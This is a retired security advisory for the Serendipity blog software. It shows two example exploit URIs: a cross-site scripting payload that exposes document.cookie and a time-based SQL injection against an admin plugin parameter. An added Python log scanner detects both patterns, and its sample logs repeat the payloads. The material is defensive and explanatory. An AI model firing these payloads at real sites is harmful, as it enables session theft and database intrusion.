RETIRED: Serendipity SQL Injection and Cross Site Scripting Vulnerabilities
Attackers can use a browser to exploit the SQL-injection issue. The attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issue.

The following example URIs are available:

http://www.example.com/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='";</script><script>alert(document.cookie)</script>

http://www.example.com/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1&apos; OR SLEEP(10)=0 LIMIT 1--+
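
A log check for the two request patterns above, as an added example that is not part of the original advisory or of Serendipity's code: it flags requests to the two named scripts whose `serendipity[textarea]` or `serendipity[plugin_to_conf]` value carries markup or quoting characters after URL decoding. The combined access-log format, the character heuristics and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Script -> (parameter, heuristic) for the two entry points named in the text.
# The character classes are assumed heuristics, not Serendipity's validation rules.
WATCHED = {
    "serendipity_admin_image_selector.php":
        ("serendipity[textarea]", re.compile(r"[<>'\"]")),
    "serendipity_admin.php":
        ("serendipity[plugin_to_conf]", re.compile(r"['\"\s]|--")),
}

# Request target inside a combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_requests(log_lines):
    """Return (line_number, script, parameter, decoded_value) for each hit."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        script = target.path.rsplit("/", 1)[-1]
        if script not in WATCHED:
            continue
        parameter, pattern = WATCHED[script]
        # parse_qsl percent-decodes names and values and maps '+' to a space,
        # so encoded brackets (%5B, %5D) and encoded quotes are both handled.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == parameter and pattern.search(value):
                hits.append((number, script, parameter, value))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2000:10:00:00 +0000] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1%27%20OR%20SLEEP(10)%3D0%20LIMIT%201--+ HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2000:10:00:09 +0000] "GET /serendipity/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%22%3B%3C%2Fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 1024',
    '198.51.100.7 - - [01/Jan/2000:10:01:00 +0000] "GET /serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=body HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2000:10:02:00 +0000] "GET /serendipity/index.php?/archives/1-hello.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit only marks a request for review; the response status and timing for the same request show whether it had any effect.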